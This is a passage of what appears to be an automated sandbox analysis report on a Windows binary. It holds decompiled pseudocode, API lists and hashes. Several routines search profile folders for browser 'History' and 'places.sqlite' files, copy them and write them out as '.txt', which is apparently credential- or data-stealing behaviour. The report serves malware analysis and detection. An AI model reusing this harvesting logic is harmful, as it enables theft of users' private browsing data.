                                                                                                                                                                                              0x00412f7a
                                                                                                                                                                                              0x00412f81
                                                                                                                                                                                              0x00412f84
                                                                                                                                                                                              0x00412f87
                                                                                                                                                                                              0x00412f97
                                                                                                                                                                                              0x00412fa2
                                                                                                                                                                                              0x00412fb2
                                                                                                                                                                                              0x00412fbd
                                                                                                                                                                                              0x00412fcd
                                                                                                                                                                                              0x00412fdf

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\History
                                                                                                                                                                                              • API String ID: 1974802433-2232271174
                                                                                                                                                                                              • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                              • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				intOrPtr _v656;
                                                                                                                                                                                              				char _v660;
                                                                                                                                                                                              				void* _t105;
                                                                                                                                                                                              				intOrPtr _t109;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				intOrPtr _t129;
                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                              				intOrPtr _t142;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t139 = __esi;
                                                                                                                                                                                              				_t138 = __edi;
                                                                                                                                                                                              				_t107 = __ebx;
                                                                                                                                                                                              				_t141 = _t142;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t109 = 0x51;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t109 = _t109 - 1;
                                                                                                                                                                                              				} while (_t109 != 0);
                                                                                                                                                                                              				_push(_t109);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t109;
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t141);
                                                                                                                                                                                              				_push(0x412fe0);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t142;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x413008);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x413008);
                                                                                                                                                                                              					E0040813C(0x61,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t107, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t141);
                                                                                                                                                                                              						_push(0x412f54);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t142;
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							_push(_v8);
                                                                                                                                                                                              							_push(0x413008);
                                                                                                                                                                                              							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v648);
                                                                                                                                                                                              							_push(L"\\History");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
                                                                                                                                                                                              							E0040377C( &_v636, _v640);
                                                                                                                                                                                              							_push(_v636);
                                                                                                                                                                                              							_push(_v16);
                                                                                                                                                                                              							_push(0x413008);
                                                                                                                                                                                              							_push(_v12);
                                                                                                                                                                                              							_push(0x413028);
                                                                                                                                                                                              							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v660);
                                                                                                                                                                                              							_push(L".txt");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E0040377C( &_v652, _v656);
                                                                                                                                                                                              							_pop(_t105);
                                                                                                                                                                                              							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_pop(_t129);
                                                                                                                                                                                              						 *[fs:eax] = _t129;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t124);
                                                                                                                                                                                              				 *[fs:eax] = _t124;
                                                                                                                                                                                              				_push(E00412FE7);
                                                                                                                                                                                              				E00403B98( &_v660, 2);
                                                                                                                                                                                              				E004034E4( &_v652);
                                                                                                                                                                                              				E00403B98( &_v648, 3);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\History
                                                                                                                                                                                              • API String ID: 1974802433-2232271174
                                                                                                                                                                                              • Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                              • Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 44%
                                                                                                                                                                                              			E0041303C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				intOrPtr _v656;
                                                                                                                                                                                              				char _v660;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                              				intOrPtr _t123;
                                                                                                                                                                                              				intOrPtr _t136;
                                                                                                                                                                                              				intOrPtr _t140;
                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t138 = __esi;
                                                                                                                                                                                              				_t137 = __edi;
                                                                                                                                                                                              				_t106 = __ebx;
                                                                                                                                                                                              				_t140 = _t141;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t108 = 0x51;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t108 = _t108 - 1;
                                                                                                                                                                                              				} while (_t108 != 0);
                                                                                                                                                                                              				_push(_t108);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t108;
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t140);
                                                                                                                                                                                              				_push(0x413276);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t141;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x4132a0);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x4132a0);
                                                                                                                                                                                              					E0040813C(0x1f,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t106, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t140);
                                                                                                                                                                                              						_push(0x4131ea);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t141;
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_push(0x4132a0);
                                                                                                                                                                                              						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v648);
                                                                                                                                                                                              						_push(L"\\places.sqlite");
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E0041256C(_v644, _t106,  &_v640, _t137, _t138);
                                                                                                                                                                                              						E0040377C( &_v636, _v640);
                                                                                                                                                                                              						_push(_v636);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              						_push(0x4132a0);
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push(E004132CC);
                                                                                                                                                                                              						E00403D10( &_v660, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v660);
                                                                                                                                                                                              						_push(L".txt");
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E0040377C( &_v652, _v656);
                                                                                                                                                                                              						_pop(_t103);
                                                                                                                                                                                              						E0040DCE8(_t103, _t106, _v652, _t137, _t138);
                                                                                                                                                                                              						_pop(_t136);
                                                                                                                                                                                              						 *[fs:eax] = _t136;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t123);
                                                                                                                                                                                              				 *[fs:eax] = _t123;
                                                                                                                                                                                              				_push(E0041327D);
                                                                                                                                                                                              				E00403B98( &_v660, 2);
                                                                                                                                                                                              				E004034E4( &_v652);
                                                                                                                                                                                              				E00403B98( &_v648, 3);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                              • String ID: .txt$\*.*$\places.sqlite
                                                                                                                                                                                              • API String ID: 1974802433-3919338718
                                                                                                                                                                                              • Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                              • Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
                                                                                                                                                                                              • Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                              				long _t11;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t16 = __ebx;
                                                                                                                                                                                              				 *__edi =  *__edi + __ecx;
                                                                                                                                                                                              				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
                                                                                                                                                                                              				 *0x41b00c = 2;
                                                                                                                                                                                              				 *0x41c010 = 0x4010b8;
                                                                                                                                                                                              				 *0x41c014 = 0x4010c0;
                                                                                                                                                                                              				 *0x41c036 = 2;
                                                                                                                                                                                              				 *0x41c000 = E00404568;
                                                                                                                                                                                              				if(E00402A94() != 0) {
                                                                                                                                                                                              					_t3 = E00402AC4();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00402B88(_t3);
                                                                                                                                                                                              				 *0x41c03c = 0xd7b0;
                                                                                                                                                                                              				 *0x41c208 = 0xd7b0;
                                                                                                                                                                                              				 *0x41c3d4 = 0xd7b0;
                                                                                                                                                                                              				 *0x41c02c = GetCommandLineA();
                                                                                                                                                                                              				 *0x41c028 = E00401180();
                                                                                                                                                                                              				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                                                                                              					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                                                                                              						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *0x41c5a8 = 3;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t11 = GetCurrentThreadId();
                                                                                                                                                                                              				 *0x41c020 = _t11;
                                                                                                                                                                                              				return _t11;
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                                                                                                                                                                                                • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00404C8F
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00404CA0
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                                • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                                                                                                                                                • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3734044017-0
                                                                                                                                                                                              • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                              • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                                                                                                                                              • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                                                                                                              • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 42%
                                                                                                                                                                                              			E004111C4(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				intOrPtr _v660;
                                                                                                                                                                                              				char _v664;
                                                                                                                                                                                              				char _v668;
                                                                                                                                                                                              				char _v672;
                                                                                                                                                                                              				char _v676;
                                                                                                                                                                                              				char _v680;
                                                                                                                                                                                              				char _v684;
                                                                                                                                                                                              				char _v688;
                                                                                                                                                                                              				intOrPtr _v692;
                                                                                                                                                                                              				char _v696;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				void* _t160;
                                                                                                                                                                                              				intOrPtr _t164;
                                                                                                                                                                                              				intOrPtr _t181;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				intOrPtr _t210;
                                                                                                                                                                                              				intOrPtr _t211;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t208 = __esi;
                                                                                                                                                                                              				_t207 = __edi;
                                                                                                                                                                                              				_t162 = __ebx;
                                                                                                                                                                                              				_t210 = _t211;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t164 = 0x56;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t164 = _t164 - 1;
                                                                                                                                                                                              				} while (_t164 != 0);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t164;
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t210);
                                                                                                                                                                                              				_push(0x411542);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t211;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x41156c);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x41156c);
                                                                                                                                                                                              					E0040813C(0x61,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t162, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t210);
                                                                                                                                                                                              						_push(0x411480);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t211;
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							_push(_v8);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v648);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							E0040813C(0x61,  &_v652);
                                                                                                                                                                                              							_push(_v652);
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
                                                                                                                                                                                              							E0040377C( &_v636, _v640);
                                                                                                                                                                                              							_push(_v636);
                                                                                                                                                                                              							_push(_v16);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							_push(_v12);
                                                                                                                                                                                              							_push(E00411574);
                                                                                                                                                                                              							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v664);
                                                                                                                                                                                              							_push(L".txt");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E0040377C( &_v656, _v660);
                                                                                                                                                                                              							_pop(_t160);
                                                                                                                                                                                              							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							_push(_v8);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v680);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							E0040813C(0x61,  &_v684);
                                                                                                                                                                                              							_push(_v684);
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
                                                                                                                                                                                              							E0040377C( &_v668, _v672);
                                                                                                                                                                                              							_push(_v668);
                                                                                                                                                                                              							_push(_v16);
                                                                                                                                                                                              							_push(0x41156c);
                                                                                                                                                                                              							_push(_v12);
                                                                                                                                                                                              							_push(E00411574);
                                                                                                                                                                                              							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v696);
                                                                                                                                                                                              							_push(E00411574);
                                                                                                                                                                                              							_push(E0041158C);
                                                                                                                                                                                              							_push(E0041158C);
                                                                                                                                                                                              							_push(L".txt");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E0040377C( &_v688, _v692);
                                                                                                                                                                                              							_pop(_t143);
                                                                                                                                                                                              							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_pop(_t188);
                                                                                                                                                                                              						 *[fs:eax] = _t188;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t181);
                                                                                                                                                                                              				 *[fs:eax] = _t181;
                                                                                                                                                                                              				_push(E0041154C);
                                                                                                                                                                                              				E00403B98( &_v696, 2);
                                                                                                                                                                                              				E004034E4( &_v688);
                                                                                                                                                                                              				E00403B98( &_v684, 4);
                                                                                                                                                                                              				E004034E4( &_v668);
                                                                                                                                                                                              				E00403B98( &_v664, 2);
                                                                                                                                                                                              				E004034E4( &_v656);
                                                                                                                                                                                              				E00403B98( &_v652, 4);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}



































                                                                                                                                                                                              0x004112ca
                                                                                                                                                                                              0x004112cf
                                                                                                                                                                                              0x004112d5
                                                                                                                                                                                              0x004112e5
                                                                                                                                                                                              0x004112ea
                                                                                                                                                                                              0x004112fb
                                                                                                                                                                                              0x0041130c
                                                                                                                                                                                              0x0041131d
                                                                                                                                                                                              0x00411328
                                                                                                                                                                                              0x00411329
                                                                                                                                                                                              0x0041132c
                                                                                                                                                                                              0x00411331
                                                                                                                                                                                              0x00411334
                                                                                                                                                                                              0x0041134a
                                                                                                                                                                                              0x0041134f
                                                                                                                                                                                              0x00411355
                                                                                                                                                                                              0x00411365
                                                                                                                                                                                              0x00411376
                                                                                                                                                                                              0x00411381
                                                                                                                                                                                              0x00411382
                                                                                                                                                                                              0x00411382
                                                                                                                                                                                              0x0041138b
                                                                                                                                                                                              0x00411391
                                                                                                                                                                                              0x00411394
                                                                                                                                                                                              0x004113aa
                                                                                                                                                                                              0x004113af
                                                                                                                                                                                              0x004113b5
                                                                                                                                                                                              0x004113c5
                                                                                                                                                                                              0x004113ca
                                                                                                                                                                                              0x004113db
                                                                                                                                                                                              0x004113ec
                                                                                                                                                                                              0x004113fd
                                                                                                                                                                                              0x00411408
                                                                                                                                                                                              0x00411409
                                                                                                                                                                                              0x0041140c
                                                                                                                                                                                              0x00411411
                                                                                                                                                                                              0x00411414
                                                                                                                                                                                              0x0041142a
                                                                                                                                                                                              0x0041142f
                                                                                                                                                                                              0x00411435
                                                                                                                                                                                              0x0041143a
                                                                                                                                                                                              0x0041143f
                                                                                                                                                                                              0x00411444
                                                                                                                                                                                              0x00411454
                                                                                                                                                                                              0x00411465
                                                                                                                                                                                              0x00411470
                                                                                                                                                                                              0x00411471
                                                                                                                                                                                              0x00411471
                                                                                                                                                                                              0x00411478
                                                                                                                                                                                              0x0041147b
                                                                                                                                                                                              0x0041147b
                                                                                                                                                                                              0x0041149a
                                                                                                                                                                                              0x004114a6
                                                                                                                                                                                              0x004114ad
                                                                                                                                                                                              0x004114b0
                                                                                                                                                                                              0x004114b3
                                                                                                                                                                                              0x004114c3
                                                                                                                                                                                              0x004114ce
                                                                                                                                                                                              0x004114de
                                                                                                                                                                                              0x004114e9
                                                                                                                                                                                              0x004114f9
                                                                                                                                                                                              0x00411504
                                                                                                                                                                                              0x00411514
                                                                                                                                                                                              0x0041151f
                                                                                                                                                                                              0x0041152f
                                                                                                                                                                                              0x00411541

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                                                                                                                                                • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                                • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
